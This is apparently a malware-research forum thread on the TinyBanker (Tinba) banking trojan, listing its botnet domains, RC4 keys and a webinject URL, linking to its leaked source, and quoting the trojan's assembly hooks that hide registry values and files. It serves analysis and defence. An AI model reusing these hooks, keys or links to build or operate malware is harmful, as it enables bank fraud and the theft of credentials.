[Peter Kleissner]

Interesting, just stumbled upon another TinyBanker sample, this one is from May 1, 2012. I have counted 4 TinyBanker botnets now in total. The data of the one I have found (the sample is attached):

Code: Select all

monolitabuse.com        registered 2012-04-27
mon1olitabuse1.com      sinkholed 2012-05-02
mon2olit2abuse.com      sinkholed 2012-05-02
mo3nolitabus33e.com     sinkholed 2012-05-02
RC4 Key: wer8c7ygbw485ghw

There is a ThreatExpert report about the sample at http://www.threatexpert.com/report.aspx ... 660371c267 . Most of the domains (not all) of the other 3 botnets were listed on http://contagiodump.blogspot.se/2012/06/amazon.html and are:

Code: Select all

Botnet 1:
dakotavolandos.com
dak1otavola1ndos.com
dako22tavol2andos.com
d3akotav33olandos.com
d4ak4otavolandos.com
RC4 key: e5bb6u6wv6whvje6

Botnet 2:
monsboys.biz
ieubietubviurb.com
uwyhbgwiechgi.com
RC4 key: wer8c7ygbw485ghw

Botnet 3:
azonpowzanadinoar.com
basdinopowadoar.com
sbasdinopowadoar.com
basdinopowadoar.eu
basdinopowadoar.org
RC4 key: e5bb6u6wv6whvje6

[SecureBanking]

I just executed some samples of this trojan on my virtual machine and realized, that most of them created wrong startup-keys, respectively the binary/directory on which the key pointed doesn't existed.
So after a reboot/logoff the trojan was dead.

Edit: I guess that they were older versions.

[Cody Johnston]

Here is a fresh sample of what behaves like Tinba. Dll in system32 folder and reg entry from AppCertDlls. Something weird about this one, it caused TDSSKiller to crash when scan was started on the PC that I pulled it from. I was unable to reproduce TDSSKiller crashing on VM.

VT 20/38

https://www.virustotal.com/file/bfdd7a1 ... /analysis/

dll and reg entries in attach

[EP_X0FF]

@iron12

Very good. Now go and find fresh dropper. Request removed.

For doing request here you need to meet the following requiremenets:

1) Be able to post in http://www.kernelmode.info/forum/viewforum.php?f=20
2) Share something from your side

For a dump-style vx exchange sites -> go elsewhere.

[comak]

Fresh timba attacking polish banks
does anyone know ats behind it?

spreded via spam

Code: Select all

domains:
sqlstackcheck.com
stack2check2.com
key:
wer8c7ygbw485ghw
ats:
https://twoqwljnbshk14.name/onlinesupprt/fold

[Peter Kleissner]

The TinyBanker 1 source code is available via http://sinowal.com/TinyBanker.rar

[EP_X0FF]

In case if your browser/av blocks downloading from the above link, here is it attached here.

[grum]

:shock: 2012 old ver? it's lame and old

[EP_X0FF]

:shock: 2012 old ver? it's lame and old

You are talking this like if you have most recent version and you are willing to share it (anyway it is open source trojan now).

[EP_X0FF]

Some thoughts from the industry leading experts

hxxps://www.opensc.ws/leaked-sources/19485-tinb ... -code.html

favorites:

About the language used:

I find it pretty funny to write a banking bot for windows in assembler... both stupid and funny...

About the code itself:

Code looks great the little i have checked.

About the compilation and testing environment:

I know how to compile, and compiles without errors. But doesn't work, I tested under XP SP3

I know how to compile

Join and compile!

XP SP3

About the experts programming skills:

well... firstly, C/C++ compiler in most circumstances will generate more optimized code in terms of size and speed...

About the "16-bit mode" (C):

basically nothing you can do in ASM, that you can't do with a modern C/C++ compiler (except for some really low level stuff, like 16-bit mode)

Some thoughts about crypters:

Crypters should help

should help, as always XD

About the rootkit part:

It is not rootkit.

About the reposting publically available pack of crapware source code:

then lets make the forum paid forum and these kind of sources can be posted in special access. un idea!

Conclusion: a fucken zoo.

I've only a little hope none of these monkeys will not blindly copy-paste anything from this "sources" anywhere, without checking. Otherwise the following fuckups (just a few examples from "not a rootkit" part) will be in every this "Code looks great"(C) based malware

Code: Select all

NewZwEnumerateValueKey proc p1:dword, p2:dword, p3:dword, p4:dword, p5:dword, p6:dword
	local RealZwEnumerateKey : dword
	local nCount : dword
	local lpName : dword

	mov RealZwEnumerateKey, eax
	mov nCount, 0

	mov eax, p4
	.if p3==0
		lea eax, (KEY_VALUE_BASIC_INFORMATION ptr [eax])._Name
	.elseif p3==1
		lea eax, (KEY_VALUE_FULL_INFORMATION ptr [eax])._Name
	.else
		xor eax, eax
		push p2
		pop nCount
	.endif
	mov lpName, eax

@RealZwEnumerateKey:
	push p6					; ResultLength
	push p5					; Length
	push p4					; KeyValueInformation
	push p3					; KeyValueInformationClass
	push nCount				; Index
	push p1					; KeyHandle
	call RealZwEnumerateKey	; Real ZwEnumerateValueKey
	.if eax!=STATUS_SUCCESS

Code: Select all

NewZwQueryDirectoryFile proc p1:dword, p2:dword, p3:dword, p4:dword, p5:dword, p6:dword, p7:dword, p8:dword, p9:dword, p10:dword, p11:dword
	local RealZwQueryDirectoryFile : dword

	mov RealZwQueryDirectoryFile, eax

@NextQuery:
	push p11						; RestartScan
	push p10						; FileName
	push p9							; ReturnSingleEntry
	push p8							; FileInformationClass
	push p7							; FileInformationLength
	push p6							; FileInformation
	push p5							; IoStatusBlock
	push p4							; ApcContext
	push p3							; ApcRoutine
	push p2							; Event
	push p1							; FileHandle
	call RealZwQueryDirectoryFile	; Real ZwQueryDirectoryFile
	.if eax!=STATUS_SUCCESS
		ret

Code: Select all

	assume eax : ptr FILE_BOTH_DIRECTORY_INFORMATION, edx : ptr FILE_BOTH_DIRECTORY_INFORMATION
	mov eax, p6